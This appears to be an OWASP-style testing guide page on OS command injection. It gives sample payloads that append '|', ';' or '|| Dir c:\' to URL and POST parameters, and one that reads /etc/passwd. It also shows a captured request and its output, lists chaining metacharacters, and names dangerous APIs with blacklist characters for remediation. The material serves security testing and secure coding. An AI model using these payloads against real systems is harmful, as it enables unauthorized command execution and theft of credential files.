## Summary

This article describes how to test an application for OS command
injection. The tester will try to inject an OS command through an HTTP
request to the application.

OS command injection is a technique used via a web interface in order to
execute OS commands on a web server. The user supplies operating system
commands through a web interface in order to execute OS commands. Any
web interface that is not properly sanitized is subject to this exploit.
With the ability to execute OS commands, the user can upload malicious
programs or even obtain passwords. OS command injection is preventable
when security is emphasized during the design and development of
applications.

## How to Test

When viewing a file in a web application, the file name is often shown
in the URL. Perl allows piping data from a process into an open
statement. The user can simply append the Pipe symbol “ |” onto the end
of the file name.

Example URL before alteration:

`http://sensitive/cgi-bin/userData.pl?doc=user1.txt`

Example URL modified:

`http://sensitive/cgi-bin/userData.pl?doc=/bin/ls`
`|`

This will execute the command “/bin/ls”.

Appending a semicolon to the end of a URL for a .PHP page followed by an
operating system command, will execute the command. %3B is url encoded
and decodes to semicolon
Example:
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

**Example**
Consider the case of an application that contains a set of documents
that you can browse from the Internet. If you fire up WebScarab, you can
obtain a POST HTTP like the following:

    POST http://www.example.com/public/doc HTTP/1.1
    Host: www.example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Proxy-Connection: keep-alive
    Referer: http://127.0.0.1/WebGoat/attack?Screen=20
    Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
    Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
    Content-Type: application/x-www-form-urlencoded
    Content-length: 33

    Doc=Doc1.pdf

In this post request, we notice how the application retrieves the public
documentation. Now we can test if it is possible to add an operating
system command to inject in the POST HTTP. Try the following:

    POST http://www.example.com/public/doc HTTP/1.1
    Host: www.example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Proxy-Connection: keep-alive
    Referer: http://127.0.0.1/WebGoat/attack?Screen=20
    Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
    Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
    Content-Type: application/x-www-form-urlencoded
    Content-length: 33

    Doc=Doc1.pdf+
    |+Dir c:\

If the application doesn't validate the request, we can obtain the
following result:

    Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+
    |+Dir c:\'
    Output...
    Il volume nell'unità C non ha etichetta.
    Numero di serie Del volume: 8E3F-4B61
    Directory of c:\
     18/10/2006 00:27 2,675 Dir_Prog.txt
     18/10/2006 00:28 3,887 Dir_ProgFile.txt
     16/11/2006 10:43
        Doc
        11/11/2006 17:25
           Documents and Settings
           25/10/2006 03:11
              I386
              14/11/2006 18:51
             h4ck3r
             30/09/2005 21:40 25,934
            OWASP1.JPG
            03/11/2006 18:29
                Prog
                18/11/2006 11:20
                    Program Files
                    16/11/2006 21:12
                        Software
                        24/10/2006 18:25
                            Setup
                            24/10/2006 23:37
                                Technologies
                                18/11/2006 11:14
                                3 File 32,496 byte
                                13 Directory 6,921,269,248 byte disponibili
                                Return code: 0

In this case, we have successfully performed an OS injection attack.

## Special Characters for Comand Injection

The following special character can be used for command injection such
as | ; & $ \> \< \` \\ \!

  - cmd1

|cmd2 : Uses of | will make command 2 to be executed weather command 1
execution is successful or not.

  - cmd1;cmd2 : Uses of ; will make command 2 to be executed weather
    command 1 execution is successful or not.
  - cmd1

| |cmd2 : Command 2 will only be executed if command 1 execution fails.

  - cmd1&\&cmd2 : Command 2 will only be executed if command 1 execution
    succeeds.
  - $(cmd) : For example, echo $(whoami) or $(touch test.sh; echo 'ls'
    \> test.sh)
  - 'cmd' : It's used to execute specific command. For example, 'whoami'
  - \>(cmd): \<(ls)
  - \<(cmd): \>(ls)

## Code Review Dangerous API

Be aware of the uses of the following API as it may introduce the
command injection risks.

Java

  - Runtime.exec()
  - getParameter
  - getRuntime.exec()
  - ProcessBuilder.start()
  - setAttribute putValue getValue
  - java.net.Socket java.io.fileInputStream java.io.FileReader

C/C++

  - system
  - exec
  - ShellExecute
  - execlp

Python

  - exec

<!-- end list -->

  - eval

<!-- end list -->

  - os.system
  - os.popen
  - subprocess.popen
  - subprocess.call

PHP

  - system
  - shell_exec
  - exec
  - proc_open
  - eval
  - passthru
  - proc_open
  - expect_open
  - ssh2_exec
  - popen

Perl

  - CGI.pm
  - referer
  - cookie
  - ReadParse

ASP.NET

  - HttpRequest.Params
  - HttpRequest.Url
  - HttpRequest.Item

## Remediation

### Sanitization

The URL and form data needs to be sanitized for invalid characters. A
“blacklist” of characters is an option but it may be difficult to
think of all of the characters to validate against. Also there may be
some that were not discovered as of yet. A “white list” containing only
allowable characters or command list should be created to validate the
user input. Characters that were missed, as well as undiscovered
threats, should be eliminated by this list.

Genereal blacklist to be included for commannd injection can be | ; & $
\> \< ' \\ \! \>\> \#

Escape or filter special characters for windows,   ( ) \< \> & \* ‘ | =
? ; \[ \] ^ \~ \! . ” % @ / \\ : + , \`
Escape or filter special characters for Linux, { }  ( ) \< \> & \* ‘ | =
? ; \[ \]  $ – \# \~ \! . ” %  / \\ : + , \`

### Permissions

The web application and its components should be running under strict
permissions that do not allow operating system command execution. Try to
verify all these informations to test from a Gray Box point of view

## Tools

  - OWASP [WebScarab](OWASP_WebScarab_Project "wikilink")
  - OWASP [WebGoat](OWASP_WebGoat_Project "wikilink")
  - [Commix](https://github.com/commixproject/commix)

## References

  - <http://www.securityfocus.com/infocus/1709>
  - <http://projects.webappsec.org/w/page/13246950/OS%20Commanding>
  - <https://cwe.mitre.org/data/definitions/78.html>
  - <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=2130132>